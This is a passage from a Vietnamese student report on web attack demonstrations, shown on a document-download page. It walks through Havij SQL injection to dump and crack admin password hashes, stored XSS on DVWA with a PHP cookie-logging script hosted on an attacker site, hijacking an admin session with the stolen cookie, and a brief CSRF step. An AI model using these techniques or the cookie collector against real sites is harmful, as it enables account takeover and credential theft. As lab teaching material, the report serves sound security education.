Tải bản đầy đủ - 0 (trang)
CHƯƠNG 3: DEMO MỘT SỐ KỸ THUẬT TẤN CÔNG ỨNG DỤNG WEB

CHƯƠNG 3: DEMO MỘT SỐ KỸ THUẬT TẤN CÔNG ỨNG DỤNG WEB

Tải bản đầy đủ - 0trang

Bước 3: Mở Havij tiến hành dò lỗi SQL của trang web.

Ta copy đường link trang web bị lỗi vào mục Target của Havij và nhấn Analyze để

chương trình tiến hành phân tích.

Kết quả sau khi phân tích:



Chương trình đã tìm thấy database của trang web.



Bước 4: Chọn mục Tables, chọn database vừa tìm thấy sau đó nhấn Get Tables



Bước 5: Chọn tt_admin trong bảng sau đó nhấn Get Columns



Bước 6: Chọn username và password sau đó nhấn Get Data



Kết quả ta được thông tin về username và password của trang web. Password được mã

hóa ở dạng MD5



Ta có thể hash ngược mã MD5 để tìm ra password dạng kí tự bằng cách chọn mục MD5

trong chương trình, sau đó dán mã MD5 ở mục password vừa tìm được vào ô MD5 hash.

Nhấn Start để tiến hành hash.



Kết quả sau khi hash password của username hoanggia



3.2 KỸ THUẬT TẤN CÔNG XSS (CROSS-SITE SCRIPTING)

Bước 1: Chuẩn bị một trang web bị lỗi XSS. Trong bài này sử dụng mã web mã nguồn

mở DVWA.

http://victim.16mb.com/login.php

Tài khoản đăng nhập:

Username: Pablo

Password: letmein

Giao diện trang web:



Giao diện sau khi đăng nhập:



Bước 2: Ta truy cập vào mục XSS (Stored), nhập thử đoạn mã sau để kiểm tra:

Trường ĐH CNTT





Kết quả sau khi nhập đoạn mã trên:



Ta thấy các đoạn mã đã được thực thi và chúng được lưu trữ trong database của trang

web. Riêng đoạn mã khơng hiển thị ra ngồi chứng tỏ web

có khả năng bị lỗi XSS Stored, cho phép lưu trữ các đoạn mã thuộc dạng script.

Dựa vào đây thay vì chèn các đoạn mã vơ hại thì các hacker có thể chèn các mã độc

chạy bằng script để lấy thông tin người dùng, bất cứ người dùng nào khi truy cập vào trang

web này thì mã độc sẽ được thực thi.

Bước 3: Ta sẽ tạo một trang web để ăn cắp cookie người dùng.

Web có địa chỉ: http://attack.16mb.com/

Trên trang web này ta tạo 1 file php (cc.php) để lấy cookie người dùng và 1 file log

(log.txt) để lưu cookie.

Nội dung của file cc.php:


function logData()

{

$ipLog="log.txt";

$cookie = $_SERVER['QUERY_STRING'];

$log=fopen("$ipLog", "a+");

fputs($log, "COOKIE: $cookie \n\n");

fclose($log);

}

logData();

?>

Bước 4: Ta quay lại mục XSS Stored của DVWA chèn đoạn script:





Kết quả sau khi chèn:



Đoạn script được lưu trên database



Sau đó chỉ việc chờ user khác đăng nhập vào là ta sẽ lấy được cookie.



Bước 5: Thử đăng nhập 1 nick khác vào trang web để kiểm tra.

Username: admin

Password: password



Kết quả sau khi đăng nhập vào và truy cập mục XSS Stored



Ta thấy cookie người dùng đã bị đánh cắp. Kiểm tra lại file log



Cookie thu được:

COOKIE:

cookie=PHPSESSID=55114c5bcbfd6e8153bc3d860eddb243;%20security=low

Bây giờ ta có thể dựa vào cookie đó để đăng nhập vào user admin mà khơng cần biết

password.

Bước 6: Mở trình duyệt firefox, cài tiện ích Cookies Manager +. Sau đó truy cập vào

trang login http://victim.16mb.com/login.php và bật Cookies Manager +

Tick vào mục victim.16mb.com PHPSESSID chọn Edit



Chép đoạn mã cookie vừa đánh cắp được vào mục Content sau đó chọn Save để lưu. Giờ

ta quay lại trang đăng nhập reload lại trang web là có thể truy cập vào bằng user admin.



3.3 3.3 THAO TÁC TRÊN CÁC THAM SỐ TRUYỀN

Bước 1: Chuẩn bị một trang web bị lỗi CSRF. Trong bài này sử dụng mã web mã nguồn

mở DVWA.

http://victim.16mb.com/login.php

Tài khoản đăng nhập:

Username: Pablo

Password: letmein

Bước 2:

Sau khi đăng nhập, chọn CSRF

Bước 3:

Thay đổi mật khẩu admin

“letmein” thành “abc123”



Tài liệu bạn tìm kiếm đã sẵn sàng tải về

CHƯƠNG 3: DEMO MỘT SỐ KỸ THUẬT TẤN CÔNG ỨNG DỤNG WEB

Tải bản đầy đủ ngay(0 tr)

×